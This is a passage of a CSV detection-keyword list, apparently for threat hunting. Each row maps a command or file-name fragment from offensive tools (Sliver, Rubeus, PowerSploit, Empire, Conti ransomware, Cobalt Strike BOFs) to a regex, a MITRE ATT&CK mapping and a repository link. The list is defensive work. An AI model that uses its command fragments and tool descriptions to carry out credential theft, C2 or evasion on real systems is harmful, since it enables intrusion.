TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","516" "* -c -z range*1-10 --hc=BBB http*",".{0,1000}\s\-c\s\-z\srange.{0,1000}1\-10\s\-\-hc\=BBB\shttp.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - 
TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","517" "* c:\\Temp\\lua.log*",".{0,1000}\sc\:\\\\Temp\\\\lua\.log.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","518" "* C:\ProgramData\sh.txt*",".{0,1000}\sC\:\\ProgramData\\sh\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","519" "* C:\temp\w.log*",".{0,1000}\sC\:\\temp\\w\.log.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","520" "* C:\Users\Public\build.bat*",".{0,1000}\sC\:\\Users\\Public\\build\.bat.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","521" "* C:\Users\Public\build.vbs*",".{0,1000}\sC\:\\Users\\Public\\build\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","522" "* C:\Users\Public\DtcInstall.txt*",".{0,1000}\sC\:\\Users\\Public\\DtcInstall\.txt.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - 
T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","523" "* c2 add *",".{0,1000}\sc2\sadd\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","526" "* c2 start http *",".{0,1000}\sc2\sstart\shttp\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","527" "* c2_server.py*",".{0,1000}\sc2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","528" "* c2profile.Name*",".{0,1000}\sc2profile\.Name.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","529" "* -c2server *",".{0,1000}\s\-c2server\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","530" "* --CaCertPath *.pfx --CaCertPassword *",".{0,1000}\s\-\-CaCertPath\s.{0,1000}\.pfx\s\-\-CaCertPassword\s.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","532" "* cachedump.py*",".{0,1000}\scachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","533" "* 
CACTUSTORCH.cna*",".{0,1000}\sCACTUSTORCH\.cna.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","534" "* CallDirect.py*",".{0,1000}\sCallDirect\.py.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","N/A","5","403","63","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z","535" "* --callobf-config *",".{0,1000}\s\-\-callobf\-config\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","536" "* --callobf-path-x64 *",".{0,1000}\s\-\-callobf\-path\-x64\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","537" "* 
--callobf-path-x86 *",".{0,1000}\s\-\-callobf\-path\-x86\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","538" "* CallStranger.py*",".{0,1000}\sCallStranger\.py.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","N/A","5","403","63","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z","539" "* camhacker *",".{0,1000}\scamhacker\s.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","540" "* camhacker:/CamHacker*",".{0,1000}\scamhacker\:\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","541" "* can now impersonate users on * via S4U2Proxy*",".{0,1000}\scan\snow\simpersonate\susers\son\s.{0,1000}\svia\sS4U2Proxy.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","542" "* Can search all Teams messages in all channels that are readable by the current user*",".{0,1000}\sCan\ssearch\sall\sTeams\smessages\sin\sall\schannels\sthat\sare\sreadable\sby\sthe\scurrent\suser.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Framework","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","543" "* canisrufus.py*",".{0,1000}\scanisrufus\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","544" "* -caplet *.cap",".{0,1000}\s\-caplet\s.{0,1000}\.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - 
T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","545" "* CarSeat.py *",".{0,1000}\sCarSeat\.py\s.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","N/A","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","546" "* cassandra-brute.nse*",".{0,1000}\scassandra\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","547" "* cassandra-info.nse*",".{0,1000}\scassandra\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","548" "* catspin.sh *",".{0,1000}\scatspin\.sh\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","549" "* CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL*",".{0,1000}\sCC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","550" "* --ccache-ticket *",".{0,1000}\s\-\-ccache\-ticket\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","551" "* cccam-version.nse*",".{0,1000}\scccam\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap 
NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","552" "* ccmpwn.py*",".{0,1000}\sccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","553" "* Celesty Binder\Celesty.exe*",".{0,1000}\sCelesty\sBinder\\Celesty\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","554" "* --certdump *",".{0,1000}\s\-\-certdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","555" "* certipy-ad*",".{0,1000}\scertipy\-ad.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation 
tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","556" "* changepw * /ticket:*",".{0,1000}\schangepw\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","557" "* chaos.exe *",".{0,1000}\schaos\.exe\s.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","558" "* charlotte.cpp*",".{0,1000}\scharlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","559" "* charlotte.dll *",".{0,1000}\scharlotte\.dll\s.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","560" "* CharSubroutine-Macro.xls*",".{0,1000}\sCharSubroutine\-Macro\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","561" "* checkRoot.ps1*",".{0,1000}\scheckRoot\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","562" "* -CheckShareAccess -Verbose*",".{0,1000}\s\-CheckShareAccess\s\-Verbose.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","563" "* CheckSMBSigning.ps1*",".{0,1000}\sCheckSMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","564" "* --check-tor *",".{0,1000}\s\-\-check\-tor\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","565" "* -ChildPath *fodhelper.exe*",".{0,1000}\s\-ChildPath\s.{0,1000}fodhelper\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-FodHelperBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","566" "* -ChildPath *sdclt.exe*",".{0,1000}\s\-ChildPath\s.{0,1000}sdclt\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SDCLTBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","567" "* chimera.py *",".{0,1000}\schimera\.py\s.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","568" "* 
chimera.sh*",".{0,1000}\schimera\.sh.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","569" "* chimera_automation *.exe*",".{0,1000}\schimera_automation\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","570" "* chrome logindata *",".{0,1000}\schrome\slogindata\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 